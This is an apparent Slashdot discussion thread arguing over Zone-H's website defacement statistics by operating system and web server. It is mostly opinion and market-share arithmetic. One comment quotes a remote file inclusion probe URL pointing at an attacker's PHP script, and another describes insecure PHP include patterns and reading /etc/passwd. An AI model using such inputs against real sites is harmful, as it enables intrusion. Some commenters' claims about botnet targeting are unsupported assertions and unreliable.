Breakdowns of Website Defacement by Platform

SkiifGeek writes "Zone-H have recently posted the statistical breakdown of the collected website defacements from the last few years. Surprisingly, in 2007 more Linux servers suffered a successful attack than all versions of Windows, combined. Similarly, more Apache installations were successfully attacked than all IIS versions combined. A day after posting this data, Zone-H have questioned the appropriateness of continuing to operate the archive. Despite the valuable information that can be gleaned from the service, it may soon be lost to the world. The natural successor to the now-defunct Alldas archive of defaced websites, Zone-H's archive maintains records of over 2.6 million defaced sites but may be shut down due to the continuous accusations of impropriety leveled against them any time they disclose and mirror a reported defacement."

Websight??

[Rovastar]

Even for slashdot that is terrible........

Re:

[tomhudson]

Its because the editors looked at the archive, and got defaced. They're only now discovering that it's a great way to distribute malware - they even ARCHIVE it for you!

Re:Websight??

[skimitar]

Yes. The day slashdot spells 'website' incorrectly is the day the terrorists have one ^H^H^H won.

Re:

[Anonymous Coward]

What is "o won"?

Re:

[Cctoide]

The first verse of the World Opponent Network [wikipedia.org] prayer.

Re:Websight??

[Anonymous Coward]

Sometimes you surf the web.

Sometimes the web surfs back.

Re:Websight??

[MrNaz]

I think it was an oversite on their part.

Re:

[Codifex Maximus]

Your insite :P is amazing!

By the way, is this another indication that "Linux has arrived"?

Re:

[chris_mahan]

Browse at -1. You'll see.

Hopefully not missing something...

[gigne]

Websight? I hope that is in TFA, which due to tradition I did not read.

Re:

[tomhudson]

Websight? I hope that is in TFA, which due to tradition I did not read.

You'd actually be doing the world a favor by defacing websight.com [websight.com] - it's another one of those "linkfest pages".

"Surprisingly"?

[Quietus]

Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. After all, most websites are vandalised through oversights in custom scripting etc., rather than security holes in Apache.

Re:"Surprisingly"?

[Rovastar]

It is difficult to get accurate stats on this. Most will be stealing passwords, XSS, SQL injections, etc. So it does seem unfair and/or pointless to list via web server software or OS platform when that has little to do with it actually software you run it on. This is dodgy admin and slack devs are to blame not the technologies. For reference there have been no exploits at all in IIS 6.0, which comes with Windows 2003, whereas they have been a few with Apache.

Re:

[SL Baur]

For reference there have been no exploits at all in IIS 6.0, which comes with Windows 2003

Well, duh. As you and the other Microsoft Fanboys here like to point out to us when it comes to desktop attacks, you're not being targeted and we are. The Storm botnet was aimed at Linux/Apache servers and specifically avoided Microsoft Windows 2003 Server.

And another quote from Microsoft Fanboys that I'll throw back at you, "you just don't have enough market share to care about."

Not to defend sloppy admin practices, but I despise hypocracy.

It's worse than that....

[Joce640k]

They count things like weak passwords as a "hack".

This definitely has no relation to platform.

Re:

[Macthorpe]

I don't like the blame the user excuse, but that is what is being reported.

Read this as: "I always deny the 'Blame the user' excuse when it's Windows, but seeing as it's Linux that has the problem here I'm willing to change my mind."

Sometimes they use a decimal point to represent 10^3 divisions and sometimes they don't use anything.

I only see one instance of this (NOYB, 2006, '1308' instead of '1.308') but I'm sure you can tell us how this completely destroys their credibility.

Headings appear to duplicate each other, like the "Remote service password guessing" and "Remote service password bruteforce"

You'd be right if they were the same thing, but they're not.

Finally, there are dozens of exploits "patched" each month for Windows but none of these technical problems shows up in their charts - only common problems are categorized. Is patch Tuesday a farce or are the fixes real and the problems worth tracking?

It's not an exploit count, it's a log of all incidents where websites were attacked successfully. I'll let you go and find an exploit count fo

Re:

[hedwards]

Read this as: "I always deny the 'Blame the user' excuse when it's Windows, but seeing as it's Linux that has the problem here I'm willing to change my mind."

Like many things there's an element of truth to the assumption that Windows has more users worthy of blame than most OSes other than possibly OSX. But in my mind, there should be a rule out of an actual bug or more sophisticated attack before concluding that it was user error. Mostly because if you're wrong about it, then there's only 1 account vulnerable, whereas if you are right, then there's an exploit that's likely in need of a fix.

I only see one instance of this (NOYB, 2006, '1308' instead of '1.308') but I'm sure you can tell us how this completely destroys their credibility.

Putting just a blank space would've been a great improvement for those

Re:Yeah, yeah, yeah, wrong.

[something_wicked_thi]

Why are you even bothering to argue this? The data doesn't tell us anything about Linux vs. Windows security. Just look at the top 5 methods by which the defacement happened:

1. Attack against the administrator/user (password stealing/sniffing): 141.660
2. Shares misconfiguration: 67.437
3. File Inclusion: 61.011
4. SQL Injection: 35.407
5. Access credentials through Man In the Middle attack: 28.046

(Those are the 2007 numbers)

That's a total of 333,561 total intrusions, and not one of those is due to inherent insecurity in anything. They are all configuration problems or bugs in the web apps themselves. And that's about 70% of the intrusions. Plus, many of the other attack vectors were of the same class. Only 13,405 were "web server intrusions" which is about 3%. If you take "RPC Server Intrusion" and "Other server intrusion" together as platform bugs (and I'm guessing most aren't), then you still only end up with another 3%.

Therefore, all this story tells us is that the software industry has to do a lot of work to protect users from themselves. It doesn't tell us that Apache or IIS or Windows or Linux is more secure than something else. It tells us users suck at security and programmers suck at making security simple.

Re:"Surprisingly"?

[call-me-kenneth]

Two factors. One, there are dozens and dozens of utterly lame hosting control panels, content management systems, messageboards and suchlike written in PHP. Secondly, IIS is far, far more secure than it was back in the bad old days. (And I speak as a fervent Apache supporter.)

Re:

[SL Baur]

What's the frequency, Kenneth?

You missed the point too. The supposedly ultra-powerful, ultra-huge, botnet that has consumed a vast portion of the internet, Storm, is specifically coded to not attack Microsoft Windows 2003 servers and only attacks Linux/Apache servers.

And you were moderated +5 informative? Bah! I want my fair share of the crack everyone seems to be smoking.

Re:

[Goaway]

And? What does "coded not to attack Microsoft Windows" mean to you, exactly?

Re:

[Goaway]

Yes, and? What is the relevance of this statement?

Re:

[wish bot]

The most powerful botnet/networked computer on the planet has been attacking Apache installations for a good long while but ignoring ISS, which may be the reason behind the results. It is an interesting question.

Re:

[CastrTroy]

That's what I was thinking. Apache is a much more powerful tool than IIS. It's like comparing radial arm saws to a mitre box. One will give much more injuries if you don't know what you're doing, but provides much more power.

Re:

[El Lobo]

Hmm.. I though here in Slashdot many people deny that there are more succesful attacks in Windows just because it is the more popular platform. So now, in this case it **is** true that there are more succesful attacks on Apache just because it is the more populat server. Well, come on people...

Re:"Surprisingly"?

[ozmanjusri]

So now, in this case it **is** true that there are more succesful attacks on Apache just because it is the more populat server. Well, come on people...

It still makes sense because the bulk of successful attacks on webservers result from attack methods that are not platform specific (Attack against the administrator/user (password stealing/sniffing), Shares misconfiguration, File Inclusion, SQL Injection etc).

The bulk of successful attacks against Windows, at least until very recently, have resulted from OS flaws.

Re:

[sco08y]

The bulk of successful attacks against Windows, at least until very recently, have resulted from OS flaws.

And now the bulk of attacks against Apache are due to admin misconfigurations. So while MS fixed the underlying problems, the Apache crew needs to improve the user interface for administration.

There is commercial software that provides a GUI for Apache (hit your favorite search engine) and it ought to be a priority to bring such functionality into the core.

Re:

[Antique Geekmeister]

There is also the absolute lack of any security model in dozens if not hundreds of ser-built add-on moudles. Some of them are robust and well-tested (Webmin comes to mind). Others are hacked up pieces of debris written by new users who just learned to spell PHP.

Re:

[cbart387]

Hmm.. I though here in Slashdot many people deny that there are more succesful attacks in Windows just because it is the more popular platform.

Not everyone. I'm not a fan of windows, only because I find Linux more responsive and easier to use for my programming. I agree with you however that there is a double standard here. People who bash Windows (where it's not warranted) get modded insightful, However when they try to defend Windows [slashdot.org] it's flamebait or troll. I'd go on a rant but I just wanted to say not everyone screams Windows security sucks yadda yadda yadda

Re:"Surprisingly"?

[multisync]

I know. It's almost like there is more than one person posting on the bbs.

Re:"Surprisingly"?

[jsiren]

Harrumph.

A platform that is reasonably popular or otherwise interesting, and unsecure by design will be attacked. A more secure platform, which is also reasonably popular or otherwise interesting, will get attacked less.

Now, looking at the attack method table, it's obvious that in a case of defacement, the underlying web server platform is largely irrelevant. Web sites these days are complex arrays of application logic and databases. Rarely does a large web site consist of a web server dealing out static files. This change enables more dynamic content and easier content administration than before; then again, it adds several places where things can go wrong. What the Zone-H statistic really tells is that in a complex setup where there are components that can be compromised, the front end web server is usually running Apache. This tells nothing about its security, since it's usually not the front end web server software that is compromised.

Now, if the site included common web applications and application platforms in its reporting, the statistics would have much more value.

Re:

[camperdave]

I though here in Slashdot many people deny that there are more succesful attacks in Windows just because it is the more popular platform.

Of course windows gets attacked more because it is more popular. Nobody is denying that. However, it's not *JUST* because it is popular. It's the ratio of successful attacks to attempted attacks that people have a problem with. Windows has historically had a high ratio, meaning it was easy to crack into. Security holes used to remain open for months, or even years,

Numbers!

[TerranFury]

The article says that there were 1,485,280 Apache defacements and 815,119 IIS defacements. This implies a total of 2,300,399 samples, of which 64.6% were Linux. For comparison, other posters here have cited a Google survey reporting that 60% of webservers run Apache. That would seem to imply that, if you pick an IIS server at random or an Apache server at random, each is about as likely to be successfully attacked as the other.

Conclusion: IIS is just as good as Apache (contrary to popular Slashdot opinion). Of course, there's a flip side: Apache is just as good as IIS -- and it's free.

[Take all this modulo the fact that 370% of statistics are, if not made up on the spot, at least full of so much noise as to be meaningless. (Sometimes the Law of Large Numbers really does require large numbers!]

Re:

[CastrTroy]

Also, a lot of people running Apache are newbs who don't know what they are doing, and using it just because it's free, or because it came with their ultra cheap hosting account. The page got defaced, not because of apache, but because they are noobs, and left SQL injection holes all over the place. How many of these defacements are due to bugs with Apache, as compared to defacements facilitated by people putting apps up on the web who didn't know what they were doing?

Re:

[TheRaven64]

Probably the more important conclusion is that most web server exploits have nothing at all to do with which web server you are running. If the exploit is in your PHP app, then neither Apache nor IIS on Linux or Windows will protect you. The entire stack has to be secure for the platform to be secure. Holes in the operating system, web server, web app, or web app framework can all cause problems. Some of these can be mitigated, for example by running the web server in a chroot environment that it doesn'

Re:

[The Spoonman]

Of course, also take into account: IIS is much easier to setup

And thus, secure. Your typical httpd.conf from a distro is a thousand lines. Most of them are comments, and half-assed attempts at documentation, but rarely useful unless you already know what you're doing. How many of those config lines are actually necessary to setup an Apache web server to get bare-minimum configuration? With IIS, it's easy: uncheck the ones you don't want, then go through the checklist provided by MS. A locked-down, s

Re:

[msuarezalvarez]

If it's a new distro, that 10 minutes will typically be spent just trying to find the httpd.conf because it could be anywhere (yes, I know "slocate httpd.conf", I was making a point).

If the distro is so new to you that you do not know where the httpd.conf file is located, then you should probably not be setting up a internet-facing web server on it...

Re:

[The Spoonman]

I knew it was too subtle.

Re:

[0kComputer]

The author attributes this number to the fact that more people are switching from IIS to Apache. Check out the latest netcraft survey [netcraft.com], that doesn't seem to be the case. Over the last few years, IIS seems to be hanging on at around 35-40% market share and apache around 50-60%.

Re:

[element-o.p.]

I kinda suspect that Apache is losing market share (is that even an appropriate term for a free product? anyway...) because some other open-source products are starting to mature. For example, while I still run Apache on my personal projects, I've switched to using Lighttpd at work because I got fed up with continuous config file syntax changes on every new release of Apache 2, and I tend to update the work servers a lot more often than my home server. So, if IIS is holding steady, and some of the other o

Re:

[Jugalator]

Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. After all, most websites are vandalised through oversights in custom scripting etc., rather than security holes in Apache.

I agree; how many of those were caused by a brain dead password in a web admin console or elsewhere?

I mean, it's not really OS/software vulnerabilities behind most of these.

That would have been surprising, and a true eye opener with web servers having years of development time and bug fixing behind them.

Re:

[Midnight Thunder]

Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange. After all, most websites are vandalised through oversights in custom scripting etc., rather than security holes in Apache.

By itself the figure is worthless. On the other hand stats indicating how the sites were compromised would be much more valuable.

Re:

[SL Baur]

By itself the figure is worthless. On the other hand stats indicating how the sites were compromised would be much more valuable.

Whew. I was beginning to think no one posting here had a clue. Sad though, that you haven't been moderated up yet.

The most "popular" attack method recently has been the Storm botnet. It specifically *does not* target Microsoft Windows 2003 Server. It's very easy to get low numbers when you are not a popular target.

Re:

[edunbar93]

Uh, website defacement would require one of two things: Either really poor filesystem security (leaving the directory for your virtual site writable by whatever user Apache runs as), or a weak FTP password. Of course, that password could just as likely be scooped by someone listening on a nearby router or some other program that broke in through a broken php program. But for the most part, I've noticed that hackers these days are more interested in making money by spamming or phishing than they are in websi

Re:

[geekboy642]

The only valid statistics in this case will be "defacements per 1,000 servers active". Apache-using programmers are (apart from the brainwashing) no different from IIS-using programmers. They all make mistakes. Some of them just make those mistakes on a clearly superior platform.

(The defensive linux fanboi will mod me troll for calling windows superior. The defensive windows fanboi will mod me troll for calling linux superior. The rational people will mod this redundant, 'cause I'm sure it's been said a tho

Re:

[SL Baur]

Given the proportion of Apache servers to IIS servers on the Internet, I don't think the ~280% difference is that strange.

Please take into account the fact that Storm botnet attack specifically avoided attacking Microsoft Windows 2003 Server. That was posted here, some time ago.

How many of the Apache attacks came from Storm? Inquiring minds want to know!

*All* of the numbers are quite small compared to what I would have expected given the reported number of members of the Storm botnet.

FYI The article does

[sleeponthemic]

Actually mention proportions. Clever little summary, it was as if one million slashdot readers suddenly cried out in indignation... "I have to read the article? Nooo"

Weighted for market share?

[JshWright]

Perhaps I missed it in TFA, but I saw no weighting for market share...

To pick an arbitrary statistic, in June 2007 Google reported Apache with a 66% market share and IIS with a 23% share (source [blogspot.com]). Given that the TFA lists "Attack against the administrator/user" as the most common attack method by a wide margin, and it seems to me that both Apache and IIS would be equally vulnerable to dumb administrators, wouldn't it make sense that the server with the larger market share would see more attacks?

Re:Weighted for market share?

[hey!]

Personally, I was alarmed by the rapid spike in website defacements on Windows 2003 during the period, which started at 72 thousand in 2005 and soared to 114 thousand in 2007. I'm sticking with Windows 2000, which started at 101 thousand in 2005 and dropped to under 24 thousand in 2007.

If this trends continues, there will be negative fourteen thousand defacements of Windows 2000 this year -- that is to say fourteen thousand anti-defacements. Fourteen thousand webmasters hosting on Windows 2000 will find their sites say what they meant to say, despite their having actually said the wrong thing.

It's like having an operating system that, instead of asking "where do you want to go today?" simply tells you where you ought to go.... Oh,wait.

Re:

[metlin]

Been reading Douglas Adams much? :)

Re:

[itsdapead]

To pick an arbitrary statistic, in June 2007 Google reported Apache with a 66% market share and IIS with a 23% share (source).

And that's 66% overall. Now think what proportion of the sites containing homebrew or 'small scale'* open source blogs, wikis, content management systems, being managed by amateur/unpaid/hobbyist webmasters are likely to be running on the free Lunux/Apache platform rather than paying money for IIS?

both Apache and IIS would be equally vulnerable to dumb administrators

...and the sa

Re:

[lseltzer]

The Google blog you cite essentially admits it's not as accurate as the Netcraft survey [netcraft.com], which shows the market shares much closer, i.e. about 51 to 36.

But neither of them is really measuring market share; they're measuring share by domain, not server. So if you assume that one OS has more domains on it, on average, than the other, then its "market share" is proportionally less than the numbers in the survey. Personally, based on what I know about the hosting market, I would assume that Apache servers have

Demographic breakdown

[G3ckoG33k]

I wouldn't be surprised if most Linux servers were defaced because of poor configurations, by home users. How many have the needed skill to do it well and really secure? How many home users wish to pay for IIS? Probably not many.

I guess IIS users on average are better at maintaining a server, as they probably are employed to do so.

It would be interesting to see a "demographic" breakdown on defaced servers, how many corporate Linux servers have been defaced. I believe the numbers will be different.

Re:

[Kadin2048]

I suspect that the number of websites running on home servers which also had a high enough profile to make it into the database when they were defaced, is quite small.

Although I think administrators are to blame, I don't think it's a "home user" versus "professional" problem. (And seriously, do you really think there aren't tons of script kiddies running pirated copies of IIS? Just because you want to use it doesn't mean you have to pay for it.) I think a lot of the blame probably lies with crummy web-ba

Re:

[EsJay]

You don't pay extra for IIS or pirate it. It's included with Windows XP Professional and Vista (I don't know exactly which editions) as well as Windows Server.

Re:

[westlake]

I wouldn't be surprised if most Linux servers were defaced because of poor configurations, by home users.

Home users running web servers?

How many home users are paying for the static IP and business grade account that makes a server practical and not a violation of their TOS?

Re:

[imAck]

Agreed that it would make sense to see the demographics. I would think that any small, home user's hobby website, the kind of which would be the most likely to be poorly configured, aren't going to be targets of website defacement.

Of course, it's a vacuous argument, I have no data to support it.

Re:

[Krondor]

I wouldn't be surprised if most Linux servers were defaced because of poor configurations, by home users. How many have the needed skill to do it well and really secure? How many home users wish to pay for IIS? Probably not many.

Exactly, how many virtual host web server businesses offer IIS for their $5/month subscribers. I haven't seen any, it's all Apache and I can guarantee most of those people are amateurs. The web guided installs of things like phpMyAdmin, Drupal, etc... and the lack of knowledge mus

Re:

[RAMMS+EIN]

``I guess IIS users on average are better at maintaining a server, as they probably are employed to do so.''

Don't fool yourself into thinking that, since they are getting paid for it, they are better at it than people who aren't getting paid. Most people I've seen "maintaining IIS" maintained IIS because it had a GUI. That is, they could fire up the config tool and check boxes until stuff seemed to work.

By contrast, most people I know who maintain Apache learn quite some about how HTTP works and how Apache

!Apache, but PHP

[Penguinisto]

Seriously... by this point, Apache can't do much more to stop someone from taking advantage of crap script and the underlying (and very likely unpatched) PHP running it.

When the cure (more often than not these days) involves not having to disturb Apache at all (save for possibly changing something in httpd.conf), but instead fixing/dumping the bad script that let the baddies in, or patching PHP to plug the hole in it, then odds are good that it ain't Apache's fault, no?

To be fair, it would also be like blaming IIS for crap XML or ASP script, and MSFT would certainly waste no time in saying so.

/P

Re:!Apache, but PHP

[Klaus_1250]

Have to agree. A substantial proportion of defacements are the results of security holes in scripting languages/scripts, with PHP leading the way. If you run a webserver, check your HTTP-security or Snort logs.

Re:

[corsec67]

Agreed on the PHP being a huge problem.
At my work, we see a bunch of attempts to exploit PHP every week, usually like this:

http://www.example.com?var=http://www.1337h4x0r/script.php

(we don't even use PHP, so this is probably coming from other hacked servers that are running php)

The "feature" they are trying to exploit there is just crazy:
If var in that case is used as a file name in a script load call, PHP will happily download the script from that website and run it instead of the local file that was ex

Re:

[MrMunkey]

I previewed this several times and completely forgot to put in my point about the article. I wouldn't say that defacements can be "blamed" on the OS, or probably even the web server (at least most of them). Bad PHP/JSP/ASP/Ruby scripts can all be taken advantage of if the web app is written poorly and/or insecurely

Re:

[loconet]

Exactly. The article is misleading. If you look at the breakdown by methods of intrusion you will see that the great majority of top reasons are actually related to application bugs and misconfiguration rather than the web server itself. Very little can be done about that and the fact that Apache is the dominant web server only adds to the numbers:

Attack against the administrator/user (password stealing/sniffing) 48.006 207.323 141.660
Shares m

Re:

[Foofoobar]

Cant agree more. Bad PHP scripts are the core issue with most of the problems of this nature over the years and now the author is using spurios logic to try and state that it is Apache and Linux's fault that people can't program PHP well.

famous quote

[wwmedia]

"98% of all statistics are made up"

Re:

[El_Muerte_TDS]

That's not true, a recent study has shown it was only 63% of all statistics.

Re:

[OMNIpotusCOM]

God damnit! It's not the statistics, it's the scripts running on calculators that people are getting the statistics from. Either that or noob calculator admins. Check your paper tape people! How many times do I have to say that? I keep my calculator in a safe (of course changing the combination to said safe 3 times a week), buried in a forrest.

And most successful attacks....

[SCHecklerX]

Are due to the 'programmer'/'sysadmin' not knowing wtf they are doing. SQL injection, Methods other than get/post, exposed admin pages, etc. This stuff, in my experience, is rarely a problem with the OS or web server itself, so these statistics are somewhat pointless.

Summary skewed.

[Lumpy]

Of course Apache and linux have more attacks than windows.

There are far more honda civics successfully stolen in the USA than BMW Isetta's Or Smart TwoFours This is because there are well over 5000 civics on the road for every BMW Isetta or Smart TwoFour on the road.

By the summary's mention and what it is alluding to, BeOS servers are the most secure because NONE of them have been compromised on the internet.

Re:

[Shino]

Right, and left-hander live longer because statistically less left-hander die in a year than right-hander...

Re:

[Yvan256]

Wow! I have to become left-handed ASAP then!

Re:

[Macthorpe]

I hate to echo what someone else said earlier, but this is exactly the argument that's been put forward for years by Windows users as to why Windows is such a popular target for malware writers. That opinion has come up against some incredibly strong opposition from a good portion of the Slashdot crowd.

Now that the shoe is on the other foot, so to speak, apparently having a larger marketshare is significant. I will find it very interesting to see who puts their hands up and admits that such exploits are mos

Re:

[aesiamun]

I can almost guarantee you, most web site exploits are exploits that involve the application, not the server.

So yeah, OS-neutral. PHP is OS neutral and so is ASP. I've seen crappy applications written in each.

Re:

[spitzak]

The problem is that in this case it is the *same* attacks on both platforms (mostly guessing or brute-forcing the password so that new pages can be uploaded). Thus the percentages on each platform almost exactly match the installed base percentages, in fact if they were different then the whole thing would be suspect.

The same thing is becoming increasingly true for malware on desktop machines.

The most common method of invading a machine is to fool the user into clicking on a download, and in this case I wou

Re:

[db32]

Funny how this is a one way argument. When MS users try to use this line of logic it gets torn to ribbons, when an OSS supporter uses the same it gets +5 Interesting

Linux X Windows??

[piojo]

Was anybody else really confused for a second when they read the headline "Linux X Windows"? What does this article have to do with X-Windows? Then I realized they meant "versus".

Re:

[DAldredge]

Their is no such thing as "X-Windows"

Re:

[piojo]

Their is no such thing as "X-Windows"

The two million results for this search [google.com] would disagree.

Re:

[bvankuik]

That's right, finally someone else that acknowledges my pet peeve! It's either 'X' or 'the X Window System'. Strangely, whenever I pedantically mention this, I get modded down!

Re:

[msuarezalvarez]

What's strange, really, is that you find it strange...

Re:

[fastest fascist]

The moron read the article. Big mistake, obviously.

Why is it that I think this website security ....

[3seas]

...issue is more serious than it really needs to be?

Using regular backup methods and unauthorized access alarms (access alarms that are either verified or not as a matter of access notification loops).
So when a site gets hacked there is timely notification and backup usage.

In other words, should access happen but not getting verification within a set amount of time, reverts back to the pre-unverified access state of the site.

perhaps we can write this in PHP or python?

Re:

[RAMMS+EIN]

Yes, but your approach assumes that people are actually trying to make things secure. The problem is that they aren't.

And frankly, I can't really blame them. When you are just getting started, or when you are under time pressure (often, one of these applies), you are happy enough once you get it to set up so that the happy flow works. Then you move on to other stuff.

And let's face it: security is difficult. There are many factors you don't control, and you must guard against all possible attack vectors whil

Here are (very simple) ratio adjusted numbers

[GeekBoy]

Taking the posted ratio of 66% Apache (assuming all Linux, which I know is not true) to 23% IIS that means that:
There are 2.869 times as many Apache installations as IIS. Windows is reported with 139,503 defacements. Linux is reported with 306,076 defacements.
If we scale the Windows defacements by the ratio of Apache/IIS we get: Windows scaled: 400,313 (rounded up) defacements Linux (raw): 306,076 defacements
Draw your own conclusions. (Realizing that this is flawed and meaningless.)

Re:

[Macthorpe]

Apache now only serves 50.93% of all websites (Netcraft confirms it!) compared to IIS's 35.56%. That would put the ratio at 1.43, and therefore your scaled defacements on Windows using the same calculationss would be 199,800, still 100,000 lower than defacements on Linux.

Also, Apache works on Unix, FreeBSD, Solaris, Novell NetWare, and Mac OS X as well as Linux and Windows. That further skews the figures, but not in a known direction.

this is flawed and meaningless.

Pretty much, yeah.

Except that IIS is at 35% and Apache at 50%

[mverwijs]

Last I checked, IIS was at about 35% and Apache at 50%.

  --> http://news.netcraft.com/archives/2008/02/06/february_2008_web_server_survey.html [netcraft.com]

Of course, these are just statistics...

-mverwijs

Interesting

[magamiako1]

You know it comes across as interesting that whenever statistics come out that show that "Windows had more worms and viruses this year than Linux or MacOSX!" people use that as fuel to the fire to continually denounce Windows as a bad platform, Microsoft is the devil, Microsoft is evil, and any other number of ways of putting down Windows to make themselves feel better.

Then a statistic that comes out that shows Linux/Apache at the top of a security vulnerability list, and it's immediately "Oh it's the users! They don't know how to implement the platform properly! It's the scripting language they used! These numbers are meaningless without marketshare values!"

What we have as facts when it comes to security vulnerabilities:

1. When more people use it, there is a tendency to have more security vulnerabilities since more eyes are scrutinizing what is or isn't possible with that platform.

2. No matter which platform, it is only as secure as the person's implementation. If they don't know how to configure the system properly, it doesn't matter in the end.

So why all the hate against Microsoft for their products if these same problems affect all platforms?

Re:

[UnknowingFool]

You know it comes across as interesting that whenever statistics come out that show that "Windows had more worms and viruses this year than Linux or MacOSX!" people use that as fuel to the fire to continually denounce Windows as a bad platform, Microsoft is the devil, Microsoft is evil, and any other number of ways of putting down Windows to make themselves feel better.

Whose fault is it that Windows architecture suffers from viruses and worms. Microsoft and only Microsoft. Whose fault is it that an Apac

While I agree with the thrust of the comments...

[HerculesMO]

I have to kind of sit back and laugh, since the defense to Apache/Linux comes in the form of "bad scripting" or other holes created by poor admin skills.

And I totally agree.

Then why do we always sit here and blast Windows and Microsoft, when in fact good admins keep their boxes running with an optimal uptime, performance, etc? I will agree with the 95/98/ME era, but coming into XP and 2003 Server, I think that it comes down to the skill of the admin to eek out the performance out of the Windows boxes rather

More apache, more linux - function brings danger

[dindi]

Well,
When you allow larger flexibility of doing things, you open doors.

PHP allows you to do ANYthing, including remote includes and relative and absolute includes (../whatever.php or /etc/passwd), while ASP is a pain in the back with these things ( include($variable) in ASP?? )

What I am trying to say, is that I am 90 percent sure, most of the defacements came from badly written code, such as index.php?news=page.php, and the include($_GET[page] kind of ignorant coding. Did I do that unthinkingly? OH yes. Everyone does, but then you learn.

Same with linux. Many people I know have servers with ssh and FTP enabled with super safe passes:

My favourite :
Company name: Heartless Buthcers LTD
Login: Heartless
pass: Butchers

Also I write a script in 5 minutes that logs into remote systems that do this and that with scripting, but I am in trouble doing anything on a remote access login to a gui, which is hardly scriptable (OK maybe that is my lack of knowledge of Wintel systems.

Just my 2 cents: with flexibility you open doors, and I think that is where it all boils down in this case.

Statistic Fibbers ... [AKA: BullShit] ... Why?

[OldHawk777]

M$-Webservers are far more "Likely to be Defaced than L/FOSS websites"; So, SkiifGeek is M$Geek.

If M$ webservers made up 54% of the market,
then L/FOSS and M$-Win webservers would be
proportionally equal in "Likelihood to be Defaced".

However, it is far more likely that L/FOSS (Apache/Google...)
webservers are about +60% of total webservers. This would indicate
(I think) that M$-websites are about 60% (I suspect, two times more) "Likely
to be Defaced than L/FOSS." IOW: Use M$-webservers at your own financial risk

Re:

[OldHawk777]

Only when I am fucking with any AC-dogmatist ... you act like you need to get a bj from god.

Netcraft confirms it

[greg1104]

For once that's on topic. I stated to rant like everybody else on how this was skewed by not taking into account the market share of Apache vs. IIS, but that's not the real story here.

Take a look at the "Webserver defaced" table. It's badly formatted in a couple of respects. Here's a copy of the interesting data with defacement numbers sorted by server platform:

nginx 729
IIS (total) 447
Apache 319
Rapidsite 244
SonataServer 178

nginx doesn't run on Windows; I'd expect most sites deploying it would be on Linux or BSD. Rapidsite runs on a customized Apache, and again while I haven't found a definitive statement here I'd expect virtual hosting using Apache is going to be Linux or BSD as well. I'd welcome corrections here if I'm wrong about that.

Combine this with the Netcraft data [netcraft.com] and the initial conclusion I would reach is that Linux+Apache is still the most secure platform. The only reason the Linux numbers are so inflated is that they include some really crappy web servers with significant vulnerabilities running something other than stock Apache.

I wish I had the raw data so I could ask some more interesting questions, like how things change you take the stupid user/admin data out. I don't care that it's possible to setup a platform up wrong and get simple vulnerabilities, I only care about how vulnerable a good installation is.

It's pretty simple really

[sexyrexy]

Windows costs money. So in general, you can be pretty sure that a business is behind a Windows server, which means vested interest in keeping it alive, which means at least some level of investment in a somewhat competent administrator to manage them. Linux is free, so every server set up by some random kid, hobbyist, or idiot is not going to drop a grand on Server 2008. They're going to install what they find for free that has easy documentation on setup.

Different Sites, Different Threats

[Aram Fingal]

A number of people posting in this discussion have pointed out that Apache is used in technically different ways from IIS. A site with lots of complex middle components, PHP, etc. is more likely to use Apache for technical reasons. That shows that there can be a sort of apples to oranges comparison in looking at total statistics. Similarly, what about the possibility that sites who know that they are more likely to be a target for defacement will choose a web server or platform accordingly. Could it be

Re:

[BrentH]

Is exactly why I don't install any 3rd party software. Only my custom BIOS, OS and browser, which I whipe every night and reprogram every morning, just to be absolutely sure nothing has been slipped in by said 3rd parties.

Luxury!

[JoeCommodore]

Heck, I do all that too, AND not only that, I create the content on the site I also keep it off-line (through local host, don't want to open up those vulnerable external connections) and am the only visitor in order to ensure that the user base is completely trustworthy.

The necessity to change every three hours the three - 127 character passwords with mandatory 'No more than two letters/numbers/symbols together' rule does make memorization a tad challenging.

Re:

[TheRaven64]

Ah, but who built your hardware? How do you know your RAM chips aren't trojaned and your CPU doesn't contain a small transmitter? Personally, I do everything in my head and never talk to anyone. It's the only way to be sure.

Re:

[Macthorpe]

if you lump windows into one category, its easily TWO TO THREE TIMES greater than Linux.

I was going to say "I don't want to be rude", but I'm actually okay with it. Bearing that in mind...

What the fuck are you talking about?

Linux - 306,076
All Windows combined - 139,503

Did you accidentally smash your head in with a frying pan while you were adding things together?